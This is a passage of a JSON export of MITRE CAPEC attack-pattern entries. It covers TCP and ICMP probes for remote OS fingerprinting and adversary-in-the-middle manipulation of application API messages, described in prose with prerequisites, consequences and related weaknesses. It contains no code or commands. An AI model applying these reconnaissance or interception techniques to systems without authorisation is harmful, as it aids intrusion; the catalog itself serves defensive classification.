number.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 55-56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Related_Weaknesses"}]}},"322":{"ID":"322","Name":"TCP (ISN) Greatest Common Divisor Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe sends a number of TCP SYN packets to an open port of a remote machine. The Initial Sequence Number (ISN) in each of the SYN/ACK response packets is analyzed to determine the smallest number that the target host uses when incrementing sequence numbers. This information can be useful for identifying an operating system because particular operating systems and versions increment sequence numbers using different values. The result of the analysis is then compared against a database of OS behaviors to determine the OS type and/or version.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"323":{"ID":"323","Name":"TCP (ISN) Counter Rate Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS detection probe measures the average rate of initial sequence number increments during a period of time. Sequence numbers are incremented using a time-based algorithm and are susceptible to a timing analysis that can determine the number of increments per unit time. The result of this analysis is then compared against a database of operating systems and versions to determine likely operation system matches.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":{"p":["Any type of active probing that involves non-standard packet headers requires the use of raw sockets, which is not available on particular operating systems (Microsoft Windows XP SP 2, for example). Raw socket manipulation on Unix/Linux requires root privileges.","A tool capable of sending and receiving packets from a remote system."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"324":{"ID":"324","Name":"TCP (ISN) Sequence Predictability Probe","Abstraction":"Detailed","Status":"Stable","Description":"This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"325":{"ID":"325","Name":"TCP Congestion Control Flag (ECN) Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"326":{"ID":"326","Name":"TCP Initial Window Size Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe checks the initial TCP Window size. TCP stacks limit the range of sequence numbers allowable within a session to maintain the \\"connected\\" state within TCP protocol logic. The initial window size specifies a range of acceptable sequence numbers that will qualify as a response to an ACK packet within a session. Various operating systems use different Initial window sizes. The initial window size can be sampled by establishing an ordinary TCP connection.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"327":{"ID":"327","Name":"TCP Options Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"328":{"ID":"328","Name":"TCP \'RST\' Flag Checksum Probe","Abstraction":"Detailed","Status":"Stable","Description":"This OS fingerprinting probe performs a checksum on any ASCII data contained within the data portion or a RST packet. Some operating systems will report a human-readable text message in the payload of a \'RST\' (reset) packet when specific types of connection errors occur. RFC 1122 allows text payloads within reset packets but not all operating systems or routers implement this functionality.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending and receiving packets from a remote system."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-212","Section":"Chapter 8. Remote OS Detection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"329":{"ID":"329","Name":"ICMP Error Message Quoting Probe","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or \\"Quoted\\" from the originating request that generated the ICMP error message. For this purpose \\"Port Unreachable\\" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply. This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \\"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \\"older\\" or \\"legacy\\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \\"Port Unreachable.."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-262"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"330":{"ID":"330","Name":"ICMP Error Message Echoing Integrity Probe","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the integrity of data returned or \\"Quoted\\" from the originating request that generated the error message. For this purpose \\"Port Unreachable\\" error messages are often used, as generating them requires the attacker to send a UDP datagram to a closed port on the target. When replying with an ICMP error message some IP/ICMP stack implementations change aspects of the IP header, change or reverse certain byte orders, reset certain field values to default values which differ between operating system and firmware implementations, and make other changes. Some IP/ICMP stacks are decidedly broken, indicating an idiosyncratic behavior that differs from the RFC specifications, such as the case when miscalculations affect a field value. A tremendous amount of information about the host operating system can be deduced from its \'echoing\' characteristics. Notably, inspection of key protocol header fields, including the echoed header fields of the encapsulating protocol can yield a wealth of data about the host operating system or firmware version.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \\"Port Unreachable.."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-262"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}]}},"331":{"ID":"331","Name":"ICMP IP Total Length Field Probe","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends a UDP packet to a closed port on the target machine to solicit an IP Header\'s total length field value within the echoed \'Port Unreachable\\" error message. RFC1122 specifies that the Header of the request must be echoed back when an error is sent in response, but some operating systems and firmware alter the integrity of the original header. Non-standard ICMP/IP implementations result in response that are useful for individuating remote operating system or router firmware versions. There are four general response types that can be used to distinguish operating systems apart: 1) the IP total length field may be calculated correctly, 2) an operating system may add 20 or more additional bytes to the length calculation, 3) the operating system may subtract 20 or more bytes from the correct length of the field or 4) the IP total length field is calculated with any other incorrect value. This type of behavior is useful for building a signature-base of operating system responses, particularly when error messages contain other types of information that is useful identifying specific operating system responses.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \\"Port Unreachable.."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-262"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary"}]}},"332":{"ID":"332","Name":"ICMP IP \'ID\' Field Error Message Probe","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging. This allows the attacker to construct a fingerprint of specific OS behaviors.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"312"}},"Prerequisites":{"Prerequisite":"The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card."},"Resources_Required":{"Resource":"A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \\"Port Unreachable.."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-262"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary"}]}},"383":{"ID":"383","Name":"Harvesting Information via API Event Monitoring","Abstraction":"Detailed","Status":"Draft","Description":"An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. Assume the adversary hosts a \\"virtual sale\\" of rare items. As other users enter the event, the attacker records via AiTM (CAPEC-94) proxy the user_ids and usernames of everyone who attends. The adversary would then be able to spam those users within the application using an automated script.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407"}},"Prerequisites":{"Prerequisite":"The target software is utilizing application framework APIs"},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"The adversary is able to gather information to potentially support further nefarious activities."}},"Mitigations":{"Mitigation":"Leverage encryption techniques during information transactions so as to protect them from attack patterns of this kind."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"311"},{"CWE_ID":"319"},{"CWE_ID":"419"},{"CWE_ID":"602"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Harvesting Usernames or UserIDs via Application API Event Monitoring",{"Date":"2018-07-31"}]}},"384":{"ID":"384","Name":"Application API Message Manipulation via Man-in-the-Middle","Abstraction":"Standard","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true \\"Adversary-in-the-Middle\\" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"385":{"ID":"385","Name":"Transaction or Event Tampering via Application API Manipulation","Abstraction":"Detailed","Status":"Draft","Description":"An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"384"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Resources_Required"}]}},"386":{"ID":"386","Name":"Application API Navigation Remapping","Abstraction":"Standard","Status":"Draft","Description":"An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user\'s photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Prerequisites":{"Prerequisite":"Targeted software is utilizing application framework APIs"},"Resources_Required":{"Resource":"A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a man-in-the-middle proxy."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"471"},{"CWE_ID":"345"},{"CWE_ID":"346"},{"CWE_ID":"602"},{"CWE_ID":"311"}]},"References":{"Reference":{"External_Reference_ID":"REF-327"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The 